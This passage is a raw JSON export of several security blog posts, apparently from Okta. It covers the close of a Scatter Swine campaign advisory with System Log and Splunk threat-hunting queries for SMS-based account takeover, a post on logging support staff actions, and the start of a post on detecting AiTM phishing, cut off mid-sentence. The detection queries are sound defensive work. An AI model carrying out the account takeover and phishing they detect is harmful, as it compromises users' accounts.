to more privileged roles. Apply ASN and IP Session Binding (from Settings > Features) to all administrative apps to prevent the replay of stolen administrative sessions. 
Enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (under Settings > Features) to force re-authentication whenever an administrative user attempts to perform sensitive actions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Talk to your SaaS partners about support for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/appsofthefuture\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Demonstrating Proof-of-Possession, Continuous Access Evaluation Profile (CAEP) and Universal Logout\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Searching Okta System Log for Scatter Swine TTPs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The following \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Reports/Reports_SysLog.htm#Filters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" query searches for SMS events (authentication challenges, password resets or factor enrolment events) from new devices and network locations for a given user, filtered according to known TTPs discovered through the analysis of this 
campaign.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType sw \\\"system.sms.send\\\" \\nand client.device eq \\\"Computer\\\" \\nand client.userAgent.os sw \\\"Windows\\\" \\nand securityContext.isProxy eq \\\"true\\\" \\nand ((debugContext.debugData.behaviors co \\\"New Device=POSITIVE\\\" and debugContext.debugData.behaviors co \\\"New IP=POSITIVE\\\") \\nOR (debugContext.debugData.logOnlySecurityData co \\\"\\\\\\\"New Device\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"\\\" and debugContext.debugData.logOnlySecurityData co \\\"\\\\\\\"New IP\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"\\\"))\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If customers are seeking to check which of these messages transited Twilio, add the following to the query:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"and debugContext.debugData.smsProvider eq \\\"TWILIO\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customers using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://splunkbase.splunk.com/app/6553/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Add-On for Splunk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" can run a similar search using the following query:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"index=main sourcetype=\\\"OktaIM2:log\\\" eventType=\\\"system.sms.send*\\\" AND\\nclient.device=\\\"Computer\\\" AND \\\"client.userAgent.os\\\"=\\\"Windows*\\\" AND\\n\\\"securityContext.isProxy\\\" = true 
AND\\n((debugContext.debugData.behaviors=\\\"*New Device=POSITIVE*\\\" AND\\ndebugContext.debugData.behaviors=\\\"*New IP=POSITIVE*\\\") OR\\n(debugContext.debugData.logOnlySecurityData=\\\"*\\\\\\\"New\\nDevice\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"*\\\" AND\\ndebugContext.debugData.logOnlySecurityData=\\\"*\\\\\\\"New IP\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"*\\\"))\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Further Threat Hunting\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using the above TTPs, below is an example query for how you might hunt for potential account takeover attempts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This is a starting point and should be adjusted for your environment. A filter for securityContext.isProxy eq \\\"true\\\" could reduce the scope of events to review.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Equally, consider that the threat actor is known to use VPS providers that accept Bitcoin as payment. 
Virtual Private Servers are not classified as proxies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the example below, we assume that:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor was NOT using FIDO2/WebAuthn factors.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor was using a Computer with a Windows Operating System.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor made the request using a New Device and New IP for the target user.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor often uses proxies or other anonymization services.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"debugContext.debugData.factor ne \\\"FIDO_WEBAUTHN\\\" and eventType sw\\n\\\"user.authentication.auth_via\\\" and client.device eq \\\"Computer\\\" and\\nclient.userAgent.os sw \\\"Windows\\\" and ((debugContext.debugData.behaviors\\nco \\\"New Device=POSITIVE\\\" and debugContext.debugData.behaviors co \\\"New\\nIP=POSITIVE\\\") OR (debugContext.debugData.logOnlySecurityData co \\\"\\\\\\\"New\\nDevice\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"\\\" and debugContext.debugData.logOnlySecurityData co\\n\\\"\\\\\\\"New 
IP\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"\\\"))\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For further advice on searching Okta System Log for suspicious events, see \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/System-Log-queries-for-attempted-account-takeover?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"this support article\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change log:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.2 - 03/08/2024\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated recommendations to include reauthentication frequency.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated recommendations to include new features released as part of Okta Secure Identity Commitment: Protected Actions, ASN/IP Session Binding.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.1 - 08/30/2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection Logic edited in System Log events to reflect that attributes in logOnlySecurityData are captured in a json format {\\\"Key\\\":\\\"Value\\\"}. 
Detections that evaluate behaviours (debugContext.debugData.behaviors) take the form of Key=Value and remain unchanged.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.0 - 08/25/2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Original version published.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-07-11T02:05:27.288Z","secAuthor":[{"id":"40144a58-c93f-5b84-895a-5658f212b168","bio":{"bio":"<p>The Defensive Cyber Operations (DCO) team is responsible for detecting and responding to cyber threats that impact Okta or our customers via the Okta platform. Our intelligence-driven capability identifies the adversaries most likely to impact Okta and our customers, and prioritises our defensive capabilities based on the threats most likely to be realised.</p>"},"image":null,"name":"Defensive Cyber Operations","jobTitle":"","slug":"defensive-cyber-operations","node_locale":"en"}]},{"slug":"/supportactions","id":"1cd8ab4a-357b-55c6-8ff9-846d1fa4e904","title":"System Log: a Window into Supporting the Okta Cloud","date":"2022-10-18T01:54:50+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Transparency is a core value at Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In April 2022, Okta 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/04/okta-concludes-its-investigation-into-the-january-2022-compromise/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"committed to a range of initiatives\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that aim to drive greater transparency in how we respond to security incidents.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of those commitments was to provide our customers with insights into all the things our customer support teams do behind the scenes to deliver the unrivaled experience that is the Okta Identity Cloud.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Under 2.6 in our Security Action Plan:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“Okta will enhance the Okta System Log so that every customer support activity - even simply viewing configurations - is visible to customers in the log. 
We will ensure the log includes the user id of the support person performing any actions including but not limited to viewing data and performing impersonation.”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This was about seizing the opportunity to advance the transparency of cloud operations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With this change, our customers will not only have an audit log of any configuration activity they perform in their Admin Console, but also an audit log of activities Okta staff perform in our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"internal\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" customer support tool, if and when those tasks are relevant to any given customer.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If Okta customer support \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"so much as views\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" a page relevant to a customer’s configuration, it is logged for the customer.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As of August 1, 2022, two new events started appearing in customer-facing logs:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"hr\",\"data\":{},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"support.org.update\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has updated the configuration or data within the Org. 
These actions are typically taken in response to a customer request, such as a request to enable an Early Access feature.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"support.org.view\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has viewed a page which contains customer data. These actions are typically taken in response to a customer request, such as in the process of investigating an issue raised through a support case.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"hr\",\"data\":{},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These events include descriptive details about what action was performed, and also why it was performed (included in the supportAction object within the debugContext.debugData object).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Reports/syslog-filters.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"browse, search or filter\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on these events in the Okta Admin Console. 
They can also be queried and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/#filtering-results\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"filtered\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" programmatically via the System Log API, and can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Exporting-Okta-Log-Data?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"exported\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"streamed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to third-party security monitoring tools.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the benefits of moving to a cloud service is the ability to hand off many such support tasks. This frees up your employees to perform higher value-add tasks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, the traditional opacity of Cloud Service Providers had made it difficult for organizations to quantify the value and time saved. By offering visibility into the actions performed by Okta’s support agents, these events also offer Okta customers a unique insight into the work it takes to deliver our service. 
Sometimes the cloud feels like “magic”, but the magic of the experience is as much about the hard work of Oktanauts behind the scenes.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s System Log contains over 700 other events that provide transparency into the actions that are occurring within your Org*, and we continue to add visibility to our customers at no additional charge. You can learn more about Okta’s System Log events in our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"help center\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We hope that this commitment to transparency sets a new benchmark for all SaaS (software-as-a-service) providers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An Okta ‘Org’ is synonymous with a tenant - a single customer often has multiple test and production orgs.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-07-11T02:00:59.589Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"<p>David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. 
In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies. </p>\n\n<p>Prior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs. </p>\n\n<p>Bradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/fastpassphishingdetection","id":"a90b27d6-4f31-5f6b-9529-9abafe43da6e","title":"Detecting Real-Time Phishing Attacks","date":"2022-11-09T23:13:28+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the last two installments in our series on phishing resistance, we discussed \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"phishing resistant authenticators\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and 
\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/10/human-factor-phishing-resistance\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"how to gather signals\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" about phishing lures directly from your users. Now let’s drill down into detection and response: what signals does Okta’s System Log provide that are indicative of in-flight phishing campaigns?\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Defensive Cyber Operations team routinely identifies phishing infrastructure configured to imitate an Okta sign-in page and proactively notify Okta customers when suspicious infrastructure we detect appears to be targeting their users. Since March 2020, we have delivered over 1000 notifications to customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Proactive alerts provides customers opportunities to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny outbound requests to phishing infrastructure from managed devices,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Request takedowns when the infringing site goes live, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Adjust access policies 
accordingly.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are no guarantees, however, that every phishing domain will be detected in advance of a campaign. And even when they are, there is often a short window of exposure before takedowns take effect.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So the harder problem for defenders is how to quickly identify threat actor activity and remediate any exposure while users are under attack.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FastPass is your secret weapon\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s passwordless solution, FastPass, offers \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-authenticators.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"strong resistance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" against real-time phishing attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When your users are enrolled in FastPass, Okta can provide defenders a high-fidelity signal for when user applications are being targeted by attackers wielding \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/sessioncookietheft\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"real-time (AiTM) 
proxies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"3Jax6edkT1fL631nUjrNuZ\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This Early Access feature is available for self-service on Okta Identity Engine - select \\\"Phishing Resistance for FastPass\\\" under \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Settings > Features\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" in the Admin Console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If one or more users enrolled in FastPass are targeted using AiTM phishing kits, Okta Identity Engine identifies the failed origin check and generates a unique event in Okta System Log:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND outcome.result eq \\\"FAILURE\\\" AND outcome.reason eq \\\"FastPass declined phishing attempt\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The utility of that single system log event can’t be overstated. In many scenarios, it’s likely to be the earliest available signal about an in-flight attack, and includes key details about the phishing infrastructure used by the adversary.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Why are those details so important? 
As we \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"previously discussed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in this series, there are relatively few organizations today that are 100% passwordless. Even in organizations where a majority of users are protected by phishing resistant factors, there are often groups of users with little choice but to rely on authenticators that are less resistant to phishing.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In our experience, opportunistic threat actors can’t or don’t discern between what authenticators are available to any given user. They rely on harvesting or enumerating large numbers of usernames from public sources during the reconnaissance phase of an attack. If an adversary sends a phishing email to ~100 users, their lures are likely to reach targets enrolled in a broad variety of factors.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So any early detection offers opportunities to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prevent other users from accessing (or authenticating via) the attacker’s infrastructure,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Evaluate if other users were previously targeted via the same 
infrastructure,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Evaluate if other users have entered credentials, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Evaluate if any of the phishing activity resulted in an account takeover.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Many of these actions can be automated using Okta Workflows (or using a third-party SOAR solution).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Workflows can be used, for example, to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Extract the IP of the attacker’s proxy server.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assess the reputation of the IP (by checking the ratio of successful to unsuccessful authentication events from that IP over the weeks or months prior to the incident).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/searchsystemlogs.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Search System Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to check 
